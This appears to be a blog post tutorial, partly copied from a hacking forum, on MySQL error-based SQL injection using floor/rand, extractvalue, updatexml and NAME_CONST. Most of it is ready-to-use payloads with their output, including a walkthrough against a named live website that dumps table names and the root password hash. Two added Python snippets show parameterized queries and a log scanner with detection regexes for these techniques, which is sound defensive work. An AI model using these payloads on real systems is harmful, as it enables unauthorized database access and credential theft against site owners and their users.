MySQL: exploitation methods for the three error-based injection modes floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Errors via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To query other data, replace the version() expression with the desired subquery.

For example, to query the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
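All three techniques above depend on the same two conditions: the id parameter is spliced into the SQL text, and the raw MySQL error is reflected back to the client. The following Python is an added example and not part of the original post. It shows the unsafe string construction next to a hardened lookup that validates the parameter type, binds it, and returns a generic message instead of the driver's error text. It uses an in-memory sqlite3 table as a stand-in for the page's article table so that it runs offline; the function names are my own.

```python
import re
import sqlite3

# Constructed stand-in for the page's `article` table. sqlite3 is used only so
# the example runs offline; the binding pattern is identical with MySQL drivers
# (PyMySQL / mysql-connector use %s placeholders instead of ?).
def make_demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, content TEXT)")
    conn.execute("INSERT INTO article VALUES (1, 'test', 'do it')")
    conn.commit()
    return conn


def build_query_unsafe(raw_id: str) -> str:
    """The pattern the post exploits: user input concatenated into the SQL text."""
    return "select * from article where id = " + raw_id


def fetch_article_safe(conn: sqlite3.Connection, raw_id: str):
    """Hardened lookup: type-check the parameter, bind it, never echo DB errors."""
    # 1. The id is a numeric key, so reject anything that is not a plain integer.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("invalid article id")
    # 2. Bind the value. The driver sends it as data, not SQL text, so
    #    floor(rand(0)*2), extractvalue(...) and updatexml(...) never reach the parser.
    try:
        return conn.execute(
            "select id, title, content from article where id = ?", (int(raw_id),)
        ).fetchone()
    except sqlite3.Error:
        # 3. Error-based injection relies on text such as
        #    "Duplicate entry '5.1.33-community-log1'" being reflected to the
        #    client. Log the real error server-side; the client gets a generic one.
        raise RuntimeError("internal error")  # constructed generic message


def is_rejected(conn: sqlite3.Connection, raw_id: str) -> bool:
    """True when the hardened lookup refuses the input before it touches SQL."""
    try:
        fetch_article_safe(conn, raw_id)
    except ValueError:
        return True
    return False
```

The type check is the cheap first line; parameter binding is the real fix, and it also covers parameters that are legitimately free text, where a whitelist regex is not available.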

Additional collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection technique for newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'
Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
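Every technique on this page (the floor/rand GROUP BY trick, extractvalue, updatexml and NAME_CONST) leaves a distinctive function name in the request and a distinctive MySQL error string in the response. The following Python is an added example, not part of the original post: it URL-decodes request targets from access-log lines, flags the four signatures, and checks a response body for reflected MySQL error text. The log lines, IP addresses and function names are my own constructions.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the error-based techniques on this page:
# (technique name, case-insensitive regex applied to the decoded request target).
SIGNATURES = [
    ("floor/rand group-by", re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I)),
    ("extractvalue",        re.compile(r"\bextractvalue\s*\(", re.I)),
    ("updatexml",           re.compile(r"\bupdatexml\s*\(", re.I)),
    ("name_const",          re.compile(r"\bname_const\s*\(", re.I)),
]

# Error text that should never reach a client. Seeing it in a response body means
# the database error is being reflected (the ERROR 1062, ERROR 1105 and
# "Duplicate column name" outputs shown on this page).
REFLECTED_ERRORS = re.compile(
    r"Duplicate entry '.*' for key '|XPATH syntax error:|Duplicate column name '", re.I
)


def classify_request(path_and_query: str) -> list:
    """Return the technique names whose signature appears in the request target.
    The target is decoded first ('+' becomes a space, as in the NAME_CONST
    payloads), so percent-encoded variants are matched as well."""
    decoded = unquote_plus(path_and_query)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def parse_access_log(lines):
    """Minimal parser for Apache/Nginx combined-format lines: yields (ip, target)."""
    rx = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = rx.match(line)
        if m:
            yield m.group(1), m.group(2)


def scan_log(lines) -> list:
    """Return (ip, technique) hits found in the log lines, in log order."""
    hits = []
    for ip, target in parse_access_log(lines):
        for technique in classify_request(target):
            hits.append((ip, technique))
    return hits


def response_leaks_db_error(body: str) -> bool:
    """True when a response body contains reflected MySQL error text."""
    return REFLECTED_ERRORS.search(body) is not None


# Constructed sample log lines modelled on the payloads in the post (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /content/detail.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2015:19:03:40 +0800] "GET /content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 211',
    '203.0.113.5 - - [11/Nov/2015:19:03:42 +0800] "GET /content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 198',
    '203.0.113.5 - - [11/Nov/2015:19:03:45 +0800] "GET /content/detail.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1" 500 190',
    '198.51.100.7 - - [11/Nov/2015:19:03:47 +0800] "GET /content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 205',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A signature hit is a starting point for triage, not proof of compromise: correlate the flagged requests with the response status (the 500s above) and with whether the application actually reflects database errors, and treat the reflected-error check as a regression test for the application-side fix rather than as a substitute for it.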